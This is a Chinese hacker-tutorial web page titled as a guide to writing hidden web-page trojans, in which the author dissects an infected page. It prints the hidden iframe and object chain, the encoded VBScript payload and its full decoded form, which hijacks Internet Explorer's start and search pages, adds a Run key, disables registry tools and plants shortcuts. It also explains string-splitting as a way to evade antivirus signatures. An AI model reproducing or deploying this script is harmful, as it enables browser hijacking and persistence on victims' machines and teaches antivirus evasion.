首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 黑客教程

如何写隐藏的网页病毒木马


http://www.gipsky.com/
今上在网上浏览网页的时候,在不知不觉中,中了网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=病毒 target="_blank"><font color=red>病毒</font></a></b>,我本来是开着瑞星杀毒的,也是昨天才升级的

却一点也没反应说有毒入侵,在经过一番折腾之后,终于明白他的机理.记录如下

[第一步]

我首先有用flashget下载了有<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=病毒 target="_blank"><font color=red>病毒</font></a></b>的网页,看源文件,里头有这一行代码

<iframe src=http://my.5e163.com/ie.htm width=0 height=0 frameborder=0 scrolling=NO></iframe>

这一行代码,好明显是说明不显示网页中,却它在网页中,说明不怀好意~~~~

[第二步]

我接着再用flashget 下载上面的<a href="http://my.5e163.com/ie.htm" target=_blank>http://my.5e163.com/ie.htm</a>,再看源代码

只有四句

<html>

<object data="<a href="http://my.5e163.com/com88.test">" target=_blank>http://my.5e163.com/com88.test"></a>

</object>

</html>

[第三步]

再下载<a href="http://my.5e163.com/com88.test" target=_blank>http://my.5e163.com/com88.test</a>得出如下代码

<html>

<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>

<script LANGUAGE="VBscript.Encode">#@~^AQgAAA==@#@&hd4R" oqDbO ,JuJLJF/r[J`w?KJ[rWOhr[rl. w\bJ'J1.Wr[EdK0J'ED-(xr'rYnMJLJxJLEY,2E[r62ELJVK.JLJ Mw\lr[rkU-jOr[ElME[rY~KmJ[ELjsPr4DY2=zJ:Xc*qv2R^WsJ@#@&S/tc] TDbOnPrCr[E|/ELJi-UGJLJWOSJ[ECM wHbELJ^MWr[JkW6E[rYwq J'ED Dr'J JLEOPAJLJawE'rVGDr'JDw\mJ[Er -jYr'rl.r[rYPhlr'JT E~,J4ODw)J&:HR*q&cmK:E@#@&Akt ILMkOn,JCE'r|/JLE`-jKJLJ0Dhr'JmDn-tkE'rmDKE[r/W6E'JD-&xE[EODE[rU r[EO,2J'EXwE[rsKDELJD-tlr'Jbxw?J'EmDm4~nmJ[rLnJBPrtOY2lJzhXcX 8vf 1W:E~@#@&A/4 " LqDbY ,J_E[r|/JLJiwUWJLE0DhJLECD-tkE[E^MWE[rdW6J'ED-qUELJO MELJUJLJY,2r'JXwE[rVG.r[J.-tlJLErx'N0E[EC!VO{aE[rlLn|EDE'rVE~,E4YOa)Jz:HRlnF & mK:E@#@&h/4 IoMrO ,J_J'JF/r[Ej'jWr[EWDhJ'EmDn-trr[E1DKJ[r/KWJLJO-&xE'rY ME[rx r'EY,2r[E62ELjsWME[r .w:XwE'r [j"Jk-;MJLJV8JBEtDY2)Jzhzc* 8&cmWsE@#@&S/4R] L MkO ,ECr[EF;J[Ei'?GJLE6YAr[rlD-trJLJ^DKJ'EkW0r'JD-q E'JD MJ'JUnr[EY,3JLJa2r[jsGMJ'J.'KzaJLJ 9j"E[rSd-!DE'rV rSJ4YYal&zsXc*nFfcmG:r@#@&S/4 " o .bYnPrur[EnZr[J`-UGJLJWYSJ'EmD '\kr[J1.GJLJkWWJ'ED-(xr'JD .ELJxnELJOPAELJaaJLJVKDr'JDwKHJ'Ea N`E[rISr'E/'Er[EDsfr~EtDOw=z&hHR*nq & mKhr@#@&S/4RIoq.kD ~J_J'EnZJLEj'?Wr'E0Dhr[El.n'HrJLEmMWE'r/WWELJO-&Ur[ED MJ[rxE[rY~2r[EaaJ[rsWMJ[rn.-tlr[EkUwwkE[r./DPuGr[Jhn,nCJLET EBJ4YYa)J&:HRX 8vf 1W:r@#@&S/tc]noqDbYnPEur[E|;E[rjwjKJ[EWDhE[rCM wtkr[J1DKE[r/G0r[EO'qxr'JD Dr'ExJLJOP3ELJawr'J^W.ELJ .wtlE[rr -obDr[JkY,uJLJG:r[En,nlr'JT JBE4YDw=z&:z l qv2 mK:E@#@&h/4 " LMrD ~rCr[JnZr'J`-jWr[EWDhJLElM -hGsk1k/wHrELJ^DKE[r/GWr[JOw&xE[rODELJ JLJD~2r[E6aJ'E^WDr'JD-;GE[rxDDE[EG^PKlr'J E'rV-uELJG:ELJKmJLJoJBEFr~EIAMm9qrIGE@#@&h/4 ] TMkO ~E_J'Jn/JLJiwUWJ'E6YAJLEmDn'HbJ[rmMGJLJdW6J'ED-bE[rxNKE'js/'ZE[E;MDE[rnxD.nELJDdrr[EW w"J'rE -qAJLE(hSE[rr]3c2(AE~,JqApKS}IAR3(3~4YOw=&zsX XFvf 1WhJ@#@&S/4cIoMkDnPrCFJLJ/ELJj'jWr[J6OE[rhmJ'J.n'Hrmr'JMWE'r/WWELJO-qrr[E NKJ[rhkwZ!DE[rDnUr[JD# r[JMdE[rkKxwnGsr[Ek1rJLJnd'?XE'r/E[rOJ'r:'fkkJLEl(VE[r ]nr[JTr/r[JD.E[rX:WGJ'E^/E~rqJBJ]3V{f 6"fE@#@&Akt " TDbY~J_J'JnZE'rj-UGJLJ0DAE[rlM wHrELJ^DKE[r/GWr[JOw&xE[rODELJ JLJD~2r[E6aJ'E^WDr'JD-tCE[rk - kUELJ[WS~KbYE'rV ES,JRO欢迎访问,hHRXF &R1WsROr@#@&hbx[GSRm^G/@#@&eC4CAA==^#~@</script>

<script LANGUAGE="VBscript.Encode">#@~^1gMAAA==@#@&WU, MDWMPMn/!:nP aO@#@&ZmsV,SW Lo b{zN[sC-KDrYd`r【音乐影视】jsE4YY2lJzhXcXF2R1W:r#@#@&ZmVsPdWULw k|)N9sl7G.kD k`E【上万首音乐】jsE4YOw=&zsX XFvf 1WhJ*@#@&@#@&Kx, DMWM~D/;:PUnXY@#@&/l^VPdGUow b{)N[9/VYK2`r音乐影视jsE4YY2lJzhXcXF2R1W:r#@#@&ZmVsPdWULw k|)N9f kVOWa`r上万首音乐jsJ4ODwlzJhXc*nq &R^GsJb@#@&@#@&WU, MDWMPMn/!:nP aO@#@&ZmsV,SW Lo b{zN[p;r13Jl!Um4`E,娱乐明星网YJ~E4DY2)J&sX l 8v&cmKhJ*@#@&ZmVs~dWxTo b{b9[}Ebm0SCEU^4`E$上万首音乐YE~rtOOa)z&hHRX 82R^K:r#@#@&@#@&oE mOkKx~JKxownk|bN9oC\KDbYn/cHBPi#@#@&dKx~nMDW.~M dEsn,xnXY@#@&dU D~?,'~hkt /M lDn?4WDD^;Yvhkt ?2n1kCVwGV9 .dvjsC-KDrYdr#~3PrzJ,_,HP3J j"SEb@#@&dU KmDoOKlDt,'~j7@#@&djRUC\`b@#@&d?nO,?sP{~S/4cZM lD U4WMY^ED`Ad4R?anmblVwGsNDk`EsC-KDrYdJ*PQ~rz链接zE~3PHP3Ecj]dJ*@#@&i?^ KmDL DnCO4P',i@#@&d?^ jl7 v#@#@&3U9PoE ^YbWU@#@&@#@&o; mOkKU,SG ow k|b9[f/VYKwcHBPj*@#@&iWx,n.DKD,Dn/;hPU XO@#@&djnDP?~x,hdtc/M CD UtWMY1;Yvhdtc?2n1kl^oW^N MdcJzV^jd .dG d3DGwr#~Q,JzE~3PHP3Ecj]dJ*@#@&i?cPlMonYhlO4,'P`7@#@&d?cjC\`*@#@&2U[,s;x1OkKx@#@&@#@&rBEBAA==^#~@</script>

<script language="Jscript.Encode">#@~^TgAAAA==@#@&0; mDkW P1sWk rYv#~`@#@&/OKb: K;O`r/VWR^sK/n`*E~l#@#@&)@#@&^sK/nkDc*@#@&ARUAAA==^#~@</script>

</html>

一片乱七八糟,但其中的有一个要害字,引起我的注重 LANGUAGE="VBscript.Encode",于是我就顺腾摸瓜,上网找了一下,这方面的资料,

原来encode是用来<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=加密 target="_blank"><font color=red>加密</font></a></b>了脚本的,但找了好一阵子,都没有这方面的<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=解密 target="_blank"><font color=red>解密</font></a></b>软件,而<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=加密 target="_blank"><font color=red>加密</font></a></b>的就有好多了,而只是在

<a href="http://www.china100.net/java1.htm" target=_blank>http://www.china100.net/java1.htm</a>

找到在线<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=解密 target="_blank"><font color=red>解密</font></a></b>的网页,于是他上面的乱七八糟的代码复制到该网页的输入框,解码成功

然后我将解码后的代码复印到记事本中,

得代码如下

<html>

<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>

<script LANGUAGE="VBscript">

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Se"&"arch Pa"&"ge", "<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\def"&"ault_p"&"age_ur"&"l", "<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Typ"&"edURLs\ur"&"l1","<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Typ"&"edUR"&"Ls\ur"&"l2","<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ty"&"pedU"&"RL"&"s\u"&"rl3","<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Fi"&"rst Ho"&"me Pa"&"ge","<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Fir"&"st H"&"om"&"e Pa"&"ge","<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Policies\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Co"&"ntr"&"ol Pa"&"ne"&"l\H"&"ome"&"Pa"&"ge","1","REG_DWORD"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\Wi"&"ndo"&"ws\C"&"urr"&"entVe"&"rsi"&"on\R"&"un\IE"&"XPL"&"ORE.EXE", "IEXPLORE.EXE <a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

wsh.RegWrite "HK"&"C"&"U\So"&"ft"&"wa"&"re\Mic"&"ro"&"sof"&"t\Wi"&"ndo"&"ws\Cur"&"ren"&"tVe"&"rs"&"ion\Pol"&"ici"&"es\Sy"&"s"&"te"&"m\Dis"&"abl"&"eRe"&"gis"&"tr"&"yToo"&"ls","1","REG_DWORD"

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\Win"&"dow Tit"&"le", "--欢迎访问 my.5e163.com--"

window.close

</script>

<script LANGUAGE="VBscript">

on error resume next

Call LongFei_AddFavorites("【音乐影视】","<a href="http://my.5e163.com")" target=_blank>http://my.5e163.com")</a>

Call LongFei_AddFavorites("【上万首音乐】","<a href="http://my.5e163.com")" target=_blank>http://my.5e163.com")</a>



on error resume next

Call LongFei_AddDesktop("音乐影视","<a href="http://my.5e163.com")" target=_blank>http://my.5e163.com")</a>

Call LongFei_AddDesktop("上万首音乐","<a href="http://my.5e163.com")" target=_blank>http://my.5e163.com")</a>



on error resume next

Call LongFei_AddQuickLaunch("[娱乐明星网]","<a href="http://my.5e163.com")" target=_blank>http://my.5e163.com")</a>

Call LongFei_AddQuickLaunch("[上万首音乐]","<a href="http://my.5e163.com")" target=_blank>http://my.5e163.com")</a>



Function LongFei_AddFavorites(N, U)

on error resume next

Set S = wsh.CreateShortcut(wsh.SpecialFolders("Favorites") "/" N ".URL")

S.TargetPath = U

S.Save()

Set Sl = wsh.CreateShortcut(wsh.SpecialFolders("Favorites") "/链接/" N ".URL")

Sl.TargetPath = U

Sl.Save()

End Function



Function LongFei_AddDesktop(N, U)

on error resume next

Set S = wsh.CreateShortcut(wsh.SpecialFolders("AllUsersDesktop") "/" N ".URL")

S.TargetPath = U

S.Save()

End Function



</script>

<script language="Jscript">

function closeit() {

setTimeout("self.close()",5)

}

closeit()

</script>

</html>



从上面的代码中,可以很轻易的发现,他是写入<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=注册表 target="_blank"><font color=red>注册表</font></a></b>的,而且是用了词组分解来避开杀毒软件对特征码的查杀,

总结一下,该网页<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=病毒 target="_blank"><font color=red>病毒</font></a></b>用了<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=病毒 target="_blank"><font color=red>病毒</font></a></b>惯用手法,

1。隐藏网页,将网页引向深层,而且用了<object data="<a href="http://my.5e163.com/com88.test">" target=_blank>http://my.5e163.com/com88.test"></a>等隐藏身份

2。<b><a href=http://www.baidu.com/s?tn=piglet&ct=&lm=&z=&rn=&word=加密 target="_blank"><font color=red>加密</font></a></b>,这不用说了,

3。词组分解,



wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

写成

wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&"t E"&"xp"&"lor"&"er\Ma"&"in\St"&"ar"&"t Pa"&"ge", "<a href="http://my.5e163.com"" target=_blank>http://my.5e163.com"</a>

等等,来避开杀毒软件。
<< 利用HOOK拦截封包原理 谈\暴库的利用 >>
评分
10987654321
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8